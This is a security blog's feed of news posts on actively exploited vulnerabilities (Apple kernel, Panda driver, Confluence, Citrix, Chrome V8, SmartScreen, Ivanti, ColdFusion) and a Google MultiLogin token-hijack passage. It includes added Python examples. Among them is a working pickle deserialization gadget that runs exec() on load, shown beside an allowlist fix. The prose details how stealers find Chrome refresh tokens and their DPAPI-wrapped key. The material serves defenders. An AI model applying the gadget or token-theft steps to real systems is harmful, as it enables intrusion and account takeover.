Exploit Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/exploit/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Feed last updated: Fri, 02 Feb 2024 09:08:08 +0000

Critical Vulnerability Uncovered in Apple iOS and macOS Exploited
https://gridinsoft.com/blogs/critical-vulnerability-ios-macos/
Fri, 02 Feb 2024 09:08:08 +0000

The Cybersecurity and Infrastructure Security Agency has identified a security flaw in Apple operating systems, particularly iOS and macOS. It has been added to the agency’s Known Exploited Vulnerabilities catalog. The vulnerability can allow attackers to bypass Pointer Authentication and gain unauthorized read and write access to the system.

Critical Apple Operating Systems Vulnerabilities Exploited

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Apple’s iOS and macOS, discovered by Apple’s security team, to its Known Exploited Vulnerabilities catalog. The flaw has been designated CVE-2022-48618 and carries a rather high severity rating of CVSS 7.8. Upon successful exploitation, attackers could bypass security measures and gain unauthorized access to sensitive information. CISA is urging all users to take immediate action to secure their devices.

Apple has not revealed much information about CVE-2022-48618 and its active exploitation in the wild. However, the Cybersecurity and Infrastructure Security Agency has directed all U.S. federal agencies to fix this flaw by February 21, per the binding operational directive (BOD 22-01) issued in November 2021.

CVE-2022-48618 Vulnerability Impact

Discovered within the kernel component of Apple’s software, this vulnerability threatens the integrity of devices by enabling adversaries to manipulate memory functions and execute arbitrary code. Successful exploitation leads to compromising personal data and undermining critical infrastructure security that relies on these technologies.

This flaw is being actively exploited and affects a wide range of devices, both older and newer models: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later. It also impacts Macs running macOS Ventura, Apple TV 4K, Apple TV 4K (2nd generation and later), Apple TV HD, and Apple Watch Series 4 and later. In terms of OS versions, the systems affected by CVE-2022-48618 are:

macOS Ventura up to version 13.1
watchOS before version 9.2
iOS and iPadOS before version 16.2
tvOS before version 16.2

Apple’s Response

In response to the discovery, Apple promptly issued patches that add enhanced security checks in the latest software updates. These updates, which include iOS 16.2 and macOS Ventura 13.1, aim to fortify devices against potential exploits. However, the delayed disclosure of the vulnerability raises questions about the timing and transparency of security communications. That said, such delays are closer to an industry standard than an omission specific to Apple.

Apple fixed a similar kernel flaw (CVE-2022-32844, CVSS score: 6.3) in iOS 15.6 and iPadOS 15.6, shipped on July 20, 2022. That logic issue allowed an app with arbitrary kernel read and write capability to bypass Pointer Authentication; Apple addressed it with improved state management.

Panda Security Driver Vulnerabilities Uncovered in APT Simulation
https://gridinsoft.com/blogs/panda-security-driver-vulnerabilities/
Mon, 29 Jan 2024 19:50:08 +0000

Security researchers discovered critical security driver vulnerabilities in Panda Security software. This chain of flaws abuses legitimate drivers to disable EDR products. Despite having relatively low CVSS scores, they may be rather efficient in real-world attacks.

Panda Security Driver Vulnerabilities Uncovered

Researchers have unearthed three critical vulnerabilities in a security driver that is widely deployed. The driver in question is pskmad_64.sys, which belongs to Panda Security. Although the vulnerabilities were discovered in July 2023, the company provided a patch only in January 2024.

The flaws were first found during a penetration testing engagement: the red team developed and used them in the course of the simulated attack. They have since been assigned CVE-2023-6330, CVE-2023-6331 and CVE-2023-6332 respectively.

Analysis of the Flaws

The first vulnerability is CVE-2023-6330, which has CVSS 6.4 and is registry-related. The driver reads certain registry values without correctly validating their contents, so an attacker able to write to those values could trigger a memory overflow. The minimum damage from this vulnerability is a denial of service.

The second vulnerability, CVE-2023-6331, also has CVSS 6.4, but Panda rates it as high. It stems from a lack of bounds checking while copying data via memmove into a non-paged memory pool. An attacker can send a maliciously crafted packet to the driver in an IRP request with IOCTL code 0xB3702C08, overflowing the non-paged pool and resulting in an out-of-bounds write. The minimum damage is, again, a denial of service.

The third vulnerability, CVE-2023-6332, has CVSS 4.1 and consists of insufficient request validation in the kernel driver: an attacker can send a crafted request that reads directly from kernel memory, leaking sensitive data. Although at first glance all of these vulnerabilities seem harmless, in combination with other vulnerabilities they can cause more serious damage.

Antivirus Drivers Exploitation – A New Trend?

The story around the vulnerable Panda Security driver is strikingly similar to the recent news about a tactic employed by Kasseika ransomware. In a BYOVD (Bring Your Own Vulnerable Driver) attack, the latter exploited a flawed driver of the VirIT Agent System security solution. This allowed the attackers to list all the processes running in the environment and suspend the ones related to security tools.

Overall, the idea of using vulnerable drivers in cyberattacks is not new. Though targeting specifically antivirus/antimalware software drivers appears to be a new trend. Such drivers have deeper system integration, leading to more comprehensive control over the system in case of a successful exploitation. Moreover, security tools themselves usually consider these drivers safe and legit, meaning that attackers can stay under the radar even having their “main weapon” deployed directly on the disk.

How to stay protected?

To stay safe, keeping your software and security systems up to date is crucial. Conducting routine system audits and implementing robust security protocols can also help protect against potential exploits. In addition, the vendor has published more detailed recommendations that address these specific vulnerabilities.

Confluence RCE Vulnerability Under Massive Exploitation
https://gridinsoft.com/blogs/confluence-rce-vulnerability-exploited/
Wed, 24 Jan 2024 09:13:09 +0000

Researchers are seeing attempts to exploit a critical vulnerability in outdated Atlassian Confluence servers. The flaw allows attackers to execute code remotely, with most attempts coming from Russian IP addresses. As is typical for remote code execution vulnerabilities, it received a high severity rating on the CVSS scale.

RCE Vulnerability in Confluence Exploited in the Wild

According to Shadowserver, a threat monitoring service, their systems detected thousands of attempts to exploit CVE-2023-22527, which was given a maximum CVSS score of 10. The vulnerability allows attackers to achieve a remote code execution (RCE) in a low-complexity attack without authentication. These attacks came from over 600 unique IP addresses, with over 39,000 exploitation attempts recorded.

Of these, 22,674 attempts were recorded from Russian IP addresses. Other popular locations for the attackers are Singapore, Hong Kong, the U.S., China, India, Brazil, Taiwan, Japan, and Ecuador. The security flaw affects outdated Confluence 8 versions released before Dec. 5th, 2023, and Confluence 8.4.5, which no longer receives backported fixes. Confluence 7.19.x Long-Term Support (LTS) versions and Atlassian Cloud instances aren’t impacted.

Details of the Vulnerability

The CVE-2023-22527 vulnerability involves insecure user input included in a specifically crafted template. Using it, attackers gain the ability to execute arbitrary code remotely on the server hosting Confluence without any authentication. Attackers can manipulate templates to include malicious code, which is executed when the server processes the template.

In addition, successfully exploiting this vulnerability could allow an adversary to cause data destruction on the affected instance. Confidentiality has no impact, as an attacker cannot exfiltrate any instance data. However, the effect of exploitation includes gaining control over the server, accessing sensitive information, disrupting operations, or launching further attacks.

Mitigation and Recommendations

The company addressed the vulnerability with the release of versions 8.5.4 (LTS), 8.6.0 (Data Center only), and 8.7.1 (Data Center only). Atlassian recommends that customers install the latest version. So, if you are on an out-of-date version, you must immediately patch it. Developers insist on patching each affected installation to the newest version available.

If your organization is running an outdated Confluence instance, it is necessary to consider it potentially compromised. It is highly recommended to immediately patch and review the systems thoroughly to detect any signs of exploitation. Security experts also suggest taking additional measures such as threat hunting, log review, monitoring, and auditing for the affected systems.

In addition, we recommend using EDR and XDR solutions. Both systems offer real-time monitoring, threat intelligence integration, automated response, and behavioral analysis, providing essential security against vulnerabilities.

2 Citrix RCE Under Active Exploitation, CISA Notifies
https://gridinsoft.com/blogs/2-citrix-rce-exploited-cisa-updates/
Fri, 19 Jan 2024 11:37:19 +0000

CISA has given a timeframe of one to three weeks to fix three vulnerabilities related to Citrix NetScaler and Google Chrome. These zero-day vulnerabilities were actively used in cyber attacks.

2 Citrix RCEs Exploited In The Wild, CISA Urges to Update

On Wednesday, January 17, the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding three actively exploited vulnerabilities. The two Citrix vulnerabilities involved are CVE-2023-6548 and CVE-2023-6549. The agency immediately added them to its Known Exploited Vulnerabilities Catalog and demanded that U.S. federal agencies patch them ASAP.

The first has a CVSS score of 5.5 and affects NetScaler ADC and Gateway management interfaces. Its deadline for fixing is January 24. As for the other two vulnerabilities, one of them can cause a denial of service condition on specific configurations. It concerns vulnerable Gateway appliances configured as VPN, ICA Proxy, CVPN or RDP Proxy services, or as AAA virtual servers. This vulnerability has a CVSS score of 8.2, higher than the previous one. Nevertheless, CISA has given three weeks to fix these two vulnerabilities.

So, why would you prioritize fixing a vulnerability with a lower CVSS score? When a flaw is easy to exploit, that decision becomes obvious and necessary. While exploiting some vulnerabilities with a maximum CVSS score requires conditions close to a laboratory setting, other issues require much less effort. It is no wonder CISA so strongly recommends that this vulnerability be fixed first and foremost.

Citrix RCE Vulnerability Details

CVE-2023-6548 is a medium-severity (CVSS score of 5.5) Remote Code Execution (RCE) vulnerability that affects Citrix NetScaler ADC and Gateway appliances. It allows an authenticated attacker with low-level privileges to execute code on the management interface of the affected devices via NSIP, SNIP, or CLIP.

Next, CVE-2023-6549 is a Denial of Service (DoS) vulnerability. It was also found in Citrix NetScaler ADC and has a CVSS score of 8.2. Threat actors can exploit it under specific configurations of vulnerable appliances. As mentioned, VPN, ICA Proxy, CVPN and RDP Proxy services, or an AAA virtual server, are at risk. The vulnerability can disrupt services by overwhelming the system, leading to a denial of service condition.

Citrix Responds to New Vulnerabilities

Citrix promptly published an advisory and recommended that customers immediately apply updates for affected versions. Customers using Citrix-managed cloud services or Adaptive Authentication are not required to take action.

In addition, the company strongly recommended that network traffic to the appliance’s management interface be separated, either physically or logically, from regular network traffic, and that the management interface not be exposed to the internet, as outlined in its secure deployment guide.

New Google Chrome 0-day Vulnerability Exploited, Update Now
https://gridinsoft.com/blogs/new-google-chrome-0-day-vulnerability/
Tue, 16 Jan 2024 20:34:57 +0000

In the most recent release notes, Google reports about a new 0-day vulnerability that is already exploited in the wild. The update fixes the issue, but the very fact of it being exploited means it should be implemented as soon as possible. It appears to be the first 0-day exploit in Chrome browser in 2024.

New Chrome 0-day Vulnerability Fixed

On January 16, Google released an update for its Chrome browser that contains fixes for 3 vulnerabilities. Among them is CVE-2024-0519, reported by an anonymous researcher. The company acknowledges that this vulnerability is being exploited in the wild.

[Image: an excerpt from Google’s patch note for the latest Chrome update]

The key issue behind the vulnerability is improper memory access control in the V8 JavaScript engine used in Chrome; it is classified as CWE-119 (improper restriction of operations within the bounds of a memory buffer). The way Chrome operates allows direct memory addressing, and without proper handling this makes it possible to reference a wrong memory location. What this gives attackers is the ability to both read and write arbitrary memory, leading to data leaks and arbitrary code execution.

Besides this most sensitive issue, 2 high-severity vulnerabilities were fixed in the same update. Both also affect V8, and are related to a lack of memory write validation and to type confusion. The latter can lead to effects similar to CVE-2024-0519, so it should be treated with the same seriousness. The good news about these two is that there is no evidence of real-world exploitation.

Google Releases Fix to the Newest 0-day Exploit

The severity of the issue obviously calls for an urgent response from the developer. Fortunately, Google never hesitates to patch such bugs. However, due to rollout limitations, the patch may not be available to all users simultaneously. Here is the list of OS-specific versions that contain the fix.

OS        Version with fix
Windows   120.0.6099.224 (225)
macOS     120.0.6099.234
Linux     120.0.6099.224

To check whether you have an updated version of the browser or to check for updates, go to Settings → About Chrome. This will open the menu which checks the update availability each time you open it.

[Image: Chrome updated]

Being the most popular web browser is not just about privileges, as you may witness. Such a humongous user base means increased (if not maxed out) attention from adversaries, who treat such vulnerabilities as nothing short of a gift. For ordinary users, the best way to counteract this is to keep an eye on the latest updates, specifically on what issues they fix.

Windows SmartScreen Vulnerability Exploited to Spread Phemedrone Stealer
https://gridinsoft.com/blogs/windows-smartscreen-vulnerability-phemedrone-stealer/
Fri, 12 Jan 2024 21:58:53 +0000

The malicious campaign exploits the CVE-2023-36025 vulnerability in Microsoft Windows Defender SmartScreen to spread Phemedrone Stealer. It utilizes intricate evasion techniques to bypass traditional security measures and target sensitive user information.

Phemedrone Stealer Campaign Exploits CVE-2023-36025

Trend Micro researchers uncovered a malware campaign exploiting the CVE-2023-36025 vulnerability in Microsoft Windows Defender SmartScreen. This campaign involves the Phemedrone Stealer, which can extract a wide range of sensitive data. Its infection chain begins with cloud-hosted malicious URL files, often disguised using URL shorteners. Upon execution, these files exploit CVE-2023-36025 to initiate the malware download.

The campaign itself is concentrated on social media. Attackers spread URL files that look like an innocent link shortcut. Clicking one initiates a call to a GitHub repo, which returns the shellcode needed to download and run the payload. While it is nothing new to see fraudsters targeting such places, the use of URL files is what makes the trick effective: they essentially act as a lockpick for user trust, spam filters and system protection all at once.

CVE-2023-36025: A Gateway for Cybercriminals

In a nutshell, CVE-2023-36025 is a critical vulnerability that affects Microsoft Windows Defender SmartScreen. It allows attackers to bypass security warnings and checks by manipulating Internet Shortcut (.url) files. Despite Microsoft’s patch released on November 14, 2023, cybercriminals have actively exploited the vulnerability, leading to its inclusion in the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) list.

In the Phemedrone campaign, attackers use advanced evasion tactics, utilizing a control panel item (.cpl) file to bypass Windows Defender SmartScreen. By default, SmartScreen should show you a warning once you open the URL shortcut, but a specifically crafted file variant circumvents the protection and executes malicious downloads in the background. Further down the chain, a couple of other known Windows weaknesses are abused, in particular the Windows Control Panel binary.

Detailed Analysis

Attackers spread Phemedrone Stealer malware using cloud hosting and URL shorteners. They exploit CVE-2023-36025 by tricking users into opening .url files. They evade Windows Defender SmartScreen using a .cpl file and the MITRE ATT&CK technique T1218.002. The malware executes a DLL loader that calls Windows PowerShell to download a loader from GitHub. The second-stage loader, Donut, can execute various types of files in memory and targets multiple applications and services to steal sensitive information.

[Image: Phemedrone Stealer’s infection chain]

The malware collects system information and compresses it into a ZIP file using MemoryStream and ZipStorage classes. It then validates the Telegram API token and sends the attacker the compressed data via the SendMessage and SendZip methods. The SendZip method uses an HTTP POST request to compress the data into a document and send it to the Telegram API.

Mitigation and Recommendations

In light of this threat, when attackers find vulnerabilities faster than developers fix them, we have a few recommendations in that regard:

  • Regularly update your OS, apps, and security solution. This action is crucial as developers continuously address security vulnerabilities through patches. Although the process may seem tedious, it is a necessary and proactive measure to ensure that your operating system, applications, and security solutions are equipped with the latest defenses against evolving cyber threats.
  • Be cautious with Internet Shortcut (.url) files. Exercise caution, especially when dealing with Internet Shortcut files, particularly those received from unverified sources. These files can serve as gateways for malware, making it essential to pay attention to the legitimacy of URLs before opening them to mitigate the risk of infection.
  • Implement advanced security solutions. This measure detects and neutralizes malware if it infiltrates your device. Robust security software with real-time monitoring and threat detection capabilities adds an extra layer of protection, helping identify and promptly respond to potential threats.
  • Stay informed about the risks of phishing and social engineering. These tactics often serve as the initial vectors for malware campaigns. Educate yourself and your team on recognizing phishing attempts, avoiding suspicious links, and verifying the authenticity of communications to minimize the likelihood of falling victim to such cyber threats.
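One way to put the “be cautious with .url files” advice into practice is a small triage check over Internet Shortcut files: it parses the [InternetShortcut] section and flags any target that is a Control Panel item (.cpl), a UNC or file path, or another non-web scheme, since a legitimate link shortcut should point at an http(s) page. This is an added example written for this post, not code from Gridinsoft or Trend Micro; the sample shortcut contents, the TEST-NET address and the flagging rules are constructed assumptions.

```python
"""Triage Windows Internet Shortcut (.url) files for targets that should never
be opened from an untrusted source: Control Panel items (.cpl), UNC/file paths
and other non-web schemes.  Added defensive example; the sample files below
are constructed for illustration."""
import re
from urllib.parse import unquote, urlparse

# Constructed sample .url files (hypothetical, not from the campaign).
# 203.0.113.0/24 is a documentation range and does not route anywhere.
SAMPLES = {
    "benign.url": "[InternetShortcut]\r\nURL=https://example.com/docs\r\n",
    "cpl_over_webdav.url": (
        "[InternetShortcut]\r\n"
        "URL=file://203.0.113.10@80/share/invoice.cpl\r\n"
    ),
    "unc_cpl.url": "[InternetShortcut]\r\nURL=\\\\203.0.113.10\\share\\update.cpl\r\n",
    "odd_scheme.url": "[InternetShortcut]\r\nurl=ftp://example.com/pub/file.zip\r\n",
    "no_section.url": "URL=https://example.com/\r\n",
}

# A link shortcut is expected to open a web page; anything else is flagged.
SAFE_SCHEMES = {"http", "https"}


def parse_url_file(text):
    """Return the URL= value from the [InternetShortcut] section, or None.

    Keys are case-insensitive; only the first URL= line in that section counts.
    A file with no such section is not a usable shortcut and is reported as such."""
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[internetshortcut]"
            continue
        if in_section:
            key, sep, value = line.partition("=")
            if sep and key.strip().lower() == "url":
                return value.strip()
    return None


def classify_target(target):
    """Return the list of reasons a shortcut target is suspicious (empty = none)."""
    reasons = []
    decoded = unquote(target)          # defeat %-encoding of the extension
    lower = decoded.lower()
    if decoded.startswith("\\\\"):
        reasons.append("UNC path: points at a remote share instead of a web page")
    else:
        scheme = urlparse(decoded).scheme.lower()
        if scheme not in SAFE_SCHEMES:
            reasons.append(f"non-web scheme '{scheme or 'none'}'")
    # Strip query/fragment before looking at the extension.
    path = re.split(r"[?#]", lower, maxsplit=1)[0]
    if path.endswith(".cpl"):
        reasons.append("target is a Control Panel item (.cpl): it gets executed, not displayed")
    return reasons


def scan(samples=SAMPLES):
    """Map file name -> (target, reasons); malformed shortcuts get a reason too."""
    report = {}
    for name, text in samples.items():
        target = parse_url_file(text)
        if target is None:
            report[name] = (None, ["no URL= under [InternetShortcut]; malformed shortcut"])
        else:
            report[name] = (target, classify_target(target))
    return report


if __name__ == "__main__":
    for name, (target, reasons) in scan().items():
        verdict = "SUSPICIOUS" if reasons else "ok"
        print(f"{name:24} {verdict:10} {target!r}")
        for reason in reasons:
            print(f"{'':24} - {reason}")
```

Real deployments would read the files from a mail gateway quarantine or a downloads folder instead of the embedded samples; the parsing and flagging logic stays the same.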

Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
https://gridinsoft.com/blogs/ivanti-connect-secure-0day-exploited/
Fri, 12 Jan 2024 10:15:08 +0000

Ivanti issued an alert about its Connect Secure VPN appliances. Advanced threat actors are exploiting two zero-day vulnerabilities in cyberattacks, possibly including state-sponsored groups. That is yet another vulnerability in Ivanti software.

Ivanti Connect Secure Zero-Day Exploited

Ivanti, a prominent software company, recently issued a critical alert concerning its Connect Secure VPN appliances. These devices are susceptible to zero-day vulnerabilities currently being exploited in sophisticated cyberattacks. Experts attribute these attacks to suspected Chinese state-backed hackers.

Ivanti has confirmed that the vulnerabilities in question allow attackers to gain unauthorized access and execute arbitrary code on affected devices. Given how widely Ivanti Connect Secure appliances are used in business environments to provide secure remote access to corporate networks, this is of heightened concern.

Details of the ICS 0-Day Vulnerability

The exploited vulnerabilities are CVE-2023-46805 (CVSS 8.2) and CVE-2024-21887 (CVSS 9.1). The vulnerabilities can be fashioned into an exploit chain to take over susceptible instances over the Internet. These flaws may lead to severe consequences, including remote code execution (RCE) and unauthorized access to sensitive data. That, actually, explains the reason for 8+ score – the best things come in two.

The first vulnerability concerns authentication bypass in the web component, which allows remote attackers to access restricted resources without proper control checks. The second vulnerability is related to command injection in the web components, which allows authenticated administrators to execute arbitrary commands on the appliance by sending specially crafted requests.

Patches Not Yet Available

Although it has identified fewer than ten customers that have been affected, Ivanti has advised all of its customers to run the external Integrity Checker Tool (ICT) as a precautionary measure. The company has also added new functionality to the external ICT, which will be incorporated into the internal ICT. Customers should ensure they have both tools’ latest versions.

As for patch fixes, Ivanti plans to release patches for these vulnerabilities during the week of January 22. However, they will be rolled out in a staggered schedule according to the product version. In the meantime, the company has released a series of mitigation steps that customers should follow immediately to safeguard their systems. It is highly recommended that organizations follow these mitigation steps, as the situation is still evolving.

How to Protect against 0-day vulnerabilities?

Since a zero-day vulnerability is a vulnerability that attackers learned about before software developers did, there is no guaranteed solution. However, some measures significantly reduce the risks, and I will list them below:

  • Use corporate-grade protection solutions like EDR/XDR. This approach to anti-malware protection focuses on endpoint activity as a whole rather than on individual devices in isolation. EDR and XDR solutions collect a vast amount of data about endpoint activity, including file operations, network traffic, and user behavior, and employ machine learning and AI to detect and respond to threats. By analyzing this data, they can identify anomalous patterns indicating a zero-day attack.
  • Apply Zero Trust. Zero trust is a cybersecurity model that grants access on a least privilege basis and continuously verifies users and devices. As a result, this reduces the attack surface and makes it more difficult to exploit vulnerabilities.
  • Perform regular pentesting. Penetration testing is a simulated real attack on an organization’s IT infrastructure to identify and assess vulnerabilities that attackers could exploit. So, this action can help organizations identify zero-day vulnerabilities that other security tools may not detect.

Two Adobe ColdFusion Vulnerabilities Exploited in The Wild
https://gridinsoft.com/blogs/two-coldfusion-vulnerabilities-exploited/
Tue, 09 Jan 2024 15:56:38 +0000

Two vulnerabilities in Adobe ColdFusion are being exploited in real-world attacks, the Cybersecurity & Infrastructure Security Agency (CISA) warns. Both issues allow arbitrary code execution and stem from insufficient validation of deserialized data. Adobe released patches for both in mid-July 2023, when they were originally reported.

ColdFusion ACE Vulnerabilities Exploited in Real-World Attacks

On January 8, CISA released its regular notice on newly exploited vulnerabilities, listing among others two flaws in Adobe ColdFusion. Both date from summer 2023, and patches have been available since then. That they are being exploited is no surprise given current trends, but since both carry a CVSS rating of 9.8, their use in live attacks is concerning.

As noted in the introduction, both CVE-2023-29300 and CVE-2023-38203 are deserialization flaws: the server deserializes attacker-supplied data without adequately validating what it contains, which leads to arbitrary code execution (ACE). Both affect the same ColdFusion versions: 2018, 2021 and 2023. By sending a specially crafted data packet to a vulnerable ColdFusion server, an attacker can make the server execute code of their choosing. No user interaction is needed, which raises the severity further.

Arbitrary code execution flaws serve both as initial access points and as opportunities for lateral movement. Because these two work without any user input, exploitation is straightforward once a vulnerable server is reachable. And since ColdFusion is a fairly common application server, a compromised instance often sits close to something valuable, and exposed instances are easy to find.
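To make the mechanism concrete (why "poor validation of deserialized data" turns into code execution, and what the fix looks like), here is an added example in Python. It is not ColdFusion code and not from the post or from Adobe: Python's pickle stands in for ColdFusion's Java-side deserialization, and the gadget, the harmless payload string and the allowlist are constructed for the illustration. A deserializer that resolves whatever callable the input names runs attacker-chosen code while loading; one that resolves only an allowlist of types rejects the same bytes.

```python
import builtins
import io
import pickle

# What the attacker wants executed on the server. Constructed and deliberately
# harmless: it only sets a marker attribute that the code below checks.
PAYLOAD_SOURCE = "import builtins; builtins.DESERIALIZATION_RAN_CODE = True"


class Gadget:
    """A gadget object: __reduce__ tells the deserializer to call exec(PAYLOAD_SOURCE).

    The serialized bytes name the callable and its arguments, so the *data* decides
    what code runs. That is the whole mechanism behind deserialization-to-ACE."""

    def __reduce__(self):
        return (exec, (PAYLOAD_SOURCE,))


def craft_packet() -> bytes:
    """The attacker-controlled input. Note the stream references builtins.exec,
    not Gadget: the class never has to exist on the target."""
    return pickle.dumps(Gadget())


def payload_ran() -> bool:
    return bool(getattr(builtins, "DESERIALIZATION_RAN_CODE", False))


def reset_marker() -> None:
    builtins.DESERIALIZATION_RAN_CODE = False


def unsafe_deserialize(packet: bytes):
    """Vulnerable pattern: every class or callable named in the stream is resolved and used."""
    return pickle.loads(packet)


class AllowlistUnpickler(pickle.Unpickler):
    """Hardened pattern: resolve only an explicit allowlist of (module, name) pairs."""

    ALLOWED = {
        ("builtins", "dict"), ("builtins", "list"), ("builtins", "str"),
        ("builtins", "int"), ("collections", "OrderedDict"),
    }

    def find_class(self, module: str, name: str):
        if (module, name) not in self.ALLOWED:
            raise pickle.UnpicklingError(f"forbidden type in stream: {module}.{name}")
        return super().find_class(module, name)


def safe_deserialize(packet: bytes):
    return AllowlistUnpickler(io.BytesIO(packet)).load()


def demo() -> dict:
    """Feed the crafted packet to both deserializers, then a benign packet to the safe one."""
    reset_marker()
    packet = craft_packet()
    unsafe_deserialize(packet)
    unsafe_executed = payload_ran()

    reset_marker()
    try:
        safe_deserialize(packet)
        safe_blocked = False
    except pickle.UnpicklingError:
        safe_blocked = True

    # Ordinary request data still round-trips through the hardened deserializer.
    benign = safe_deserialize(pickle.dumps({"method": "ping", "args": [1, 2]}))
    return {
        "unsafe_executed": unsafe_executed,
        "safe_blocked": safe_blocked,
        "safe_executed": payload_ran(),
        "benign_roundtrip": benign,
    }


if __name__ == "__main__":
    print(demo())
```

The allowlist is the important part: a denylist of known-bad classes is what vendors typically ship first, and it tends to be bypassed by the next gadget somebody finds, which is the pattern of a first fix followed by a second CVE days later.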

List of Affected ColdFusion Versions

Vulnerability       Affected ColdFusion versions
CVE-2023-29300      ColdFusion 2018, 2021, 2023
CVE-2023-38203      ColdFusion 2018, 2021, 2023

Adobe ColdFusion Vulnerability Patches & Mitigation

After the vulnerabilities were reported in July 2023, Adobe released updates that fix them and urged users to install the patches as soon as possible. There is no better moment to update than right now, after the official notification that they are being exploited. Here are the ColdFusion updates that close the issues:

Version             Fixed in
ColdFusion 2023     Update 1
ColdFusion 2021     Update 7
ColdFusion 2018     Update 17

Adobe lists no workaround or mitigation, which is expected: a deserialization bug of this kind cannot be fixed without changing the program code. Compensating controls such as keeping ColdFusion servers and their administration interfaces off the public Internet reduce exposure but do not remove the flaw. Note also that the updates in the table are those named for the first of the two CVEs; CVE-2023-38203 was reported a few days after that fix and patched in a follow-up update, so the safe target is the latest available update for your branch rather than the exact numbers above. In any case, there has been over half a year to update, so improvising stopgaps now makes little sense.

Beyond patching, network-level controls help. Network Detection and Response (NDR) tools flag suspicious traffic towards your servers, and an Extended Detection and Response (XDR) platform correlates that with endpoint activity, which gives you a chance to catch exploitation of both known flaws and ones not yet disclosed. Neither replaces the patch.

OAuth2 Session Hijack Vulnerability: Details Uncovered
https://gridinsoft.com/blogs/oauth2-vulnerability-details/
Tue, 09 Jan 2024 08:52:09 +0000

A sophisticated exploit against Google's account authentication (the OAuth2-based sign-in that Chrome uses) was first advertised by a threat actor known as PRISMA and later analyzed publicly by researchers at CloudSEK. It abuses an undocumented Google endpoint, MultiLogin, to generate and maintain persistent Google cookies even after a password reset.

OAuth2 Vulnerability Allows for Persistent Session Hijacking

The attackers found a way to use data Chrome stores locally to hijack sessions without the risk of being cut off by password changes. They target Chrome's token_service table in the Web Data SQLite database to exfiltrate tokens and account IDs. This table holds the GAIA ID (Google's internal account identifier) for each signed-in account and the corresponding encrypted refresh token in the encrypted_token column. The attackers then decrypt these tokens using the key stored in Chrome's Local State file within the User Data directory.

This is the same scheme Chrome uses to protect saved passwords and cookies, so the stealers did not need to break any cryptography: the Local State key is wrapped with Windows DPAPI under the logged-on user's credentials, and malware running as that user can unwrap it. What the exploit's success required was a precise understanding of Chrome's data layout, specifically the structures tied to user authentication and token management.
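As an added illustration (not code from the post or from the stealers it describes), the following Python triage script reads the two artifacts named above, a Web Data database and a Local State file, both constructed here in the shape Chrome uses with made-up values, and reports which GAIA IDs had refresh tokens stored and how each blob is protected. It deliberately stops short of decryption: the Local State key is wrapped with DPAPI and can only be unwrapped under the victim's Windows logon, which is exactly why the stealers run as that user. The output is what a responder needs, the list of accounts whose sessions must be revoked.

```python
import base64
import json
import sqlite3

# Constructed 'Local State' content. On Windows, os_crypt.encrypted_key is the
# base64 of b"DPAPI" followed by a DPAPI blob; filler bytes stand in for the blob.
SAMPLE_LOCAL_STATE = json.dumps({
    "os_crypt": {"encrypted_key": base64.b64encode(b"DPAPI" + b"\x01" * 32).decode()}
})

# Constructed token_service rows in Chrome's shape: service = "AccountId-<GAIA ID>",
# encrypted_token = b"v10" + 12-byte nonce + AES-256-GCM ciphertext + 16-byte tag.
# The second row mimics an older DPAPI-only blob (no "v10" prefix). All values are made up.
SAMPLE_ROWS = [
    ("AccountId-100000000000000000001", b"v10" + b"\x00" * 12 + b"\xaa" * 40 + b"\xbb" * 16),
    ("AccountId-100000000000000000002", b"\x01\x00\x00\x00\xd0\x8c" + b"\xcc" * 50),
]


def build_webdata(rows) -> sqlite3.Connection:
    """Create an in-memory copy of the relevant part of Chrome's Web Data schema."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE token_service (service VARCHAR PRIMARY KEY NOT NULL, encrypted_token BLOB)"
    )
    con.executemany("INSERT INTO token_service VALUES (?, ?)", rows)
    return con


def parse_local_state_key(local_state_json: str) -> dict:
    """Report how the Chrome master key in Local State is wrapped."""
    raw = base64.b64decode(json.loads(local_state_json)["os_crypt"]["encrypted_key"])
    if raw.startswith(b"DPAPI"):
        # The remainder is a DPAPI blob: only CryptUnprotectData under the same Windows
        # user context can recover the AES key, so an offline copy of the file is not enough.
        return {"wrapping": "DPAPI", "blob_len": len(raw) - len(b"DPAPI")}
    return {"wrapping": "unknown", "blob_len": len(raw)}


def triage_tokens(con: sqlite3.Connection) -> list[dict]:
    """List accounts with a stored refresh token and classify each blob."""
    results = []
    for service, blob in con.execute(
        "SELECT service, encrypted_token FROM token_service ORDER BY rowid"
    ):
        gaia_id = service.removeprefix("AccountId-")
        if blob.startswith(b"v10"):
            nonce, ciphertext, tag = blob[3:15], blob[15:-16], blob[-16:]
            results.append({
                "gaia_id": gaia_id,
                "scheme": "AES-256-GCM, key from Local State",
                "nonce_len": len(nonce),
                "ciphertext_len": len(ciphertext),
                "tag_len": len(tag),
            })
        else:
            results.append({"gaia_id": gaia_id, "scheme": "DPAPI-only (legacy)"})
    return results


def accounts_to_revoke(con: sqlite3.Connection) -> list[str]:
    """Every account with a stored token. A password change alone does not invalidate
    a token that was already exfiltrated; the sessions have to be revoked."""
    return [row["gaia_id"] for row in triage_tokens(con)]


if __name__ == "__main__":
    con = build_webdata(SAMPLE_ROWS)
    print(parse_local_state_key(SAMPLE_LOCAL_STATE))
    for row in triage_tokens(con):
        print(row)
    print("revoke sessions for GAIA IDs:", accounts_to_revoke(con))
```

On a real host the inputs are the files "User Data\Default\Web Data" and "User Data\Local State"; copy them while Chrome is closed, because the database is locked while it runs.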

MultiLogin Endpoint Is The Culprit

The MultiLogin endpoint is an internal part of Google's account system. It synchronizes account state across Google services, aligning the browser's signed-in accounts with Google's authentication cookies. Attackers abuse exactly this function: by submitting a set of account IDs and the matching auth-login tokens, they obtain fresh cookies and keep unauthorized access to Google services.

This is the endpoint's normal operation turned to malicious use. Its obscurity and its power make it an attractive target: it is not publicly documented, and because it manages simultaneous sessions and profile switching, anyone who understands its protocol can mint valid session cookies on demand.

The Discovery and Spread of the OAuth2 Exploit

